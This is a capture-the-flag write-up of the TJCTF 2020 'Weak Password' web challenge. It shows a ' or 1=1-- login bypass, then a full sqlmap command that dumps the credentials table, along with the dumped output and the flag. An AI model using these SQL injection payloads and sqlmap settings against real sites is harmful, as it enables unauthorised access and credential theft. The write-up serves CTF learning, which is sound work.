TJCTF2020 - Weak Password

Posted on mar. 02 juin 2020 in CTF

solves : 204

Points: 20 

Written by saisree

It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})

We have a standard login page with two fields: username and password. We need to recover the admin flag.

Weak_password_login.jpeg

Let's try some standard SLQi : ' or 1=1--.

Weak_password_login_2.jpeg

We are login. So, the code form is vunerable. This time, I used sqlmap to dump the table and get the password:

sqlmap https://weak_password.tjctf.org/login --method=POST --data "username=admin&password=admin" -p "password" --not-string="Wrong" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0" --tamper=space2comment --level 5 --risk 3 --tables --dump -T userandpassword

Database: SQLite_masterdb
Table: userandpassword
[6 entries]
+----+-----------------------+---------------------+
| id | password              | username            |
+----+-----------------------+---------------------+
| 1  | blindsqli14519        | admin               |
| 2  | random_passwd         | random_user         |
| 3  | evenmorerandom_passwd | evenmorerandom_user |
| 4  | blindsqli14519        | admin               |
| 5  | random_passwd         | random_user         |
| 6  | evenmorerandom_passwd | evenmorerandom_user |
+----+-----------------------+---------------------+

We got the flag: tjctf{blindsqli14519}.

hack learn ctf tjctf 2020 web sqli blind sqlmap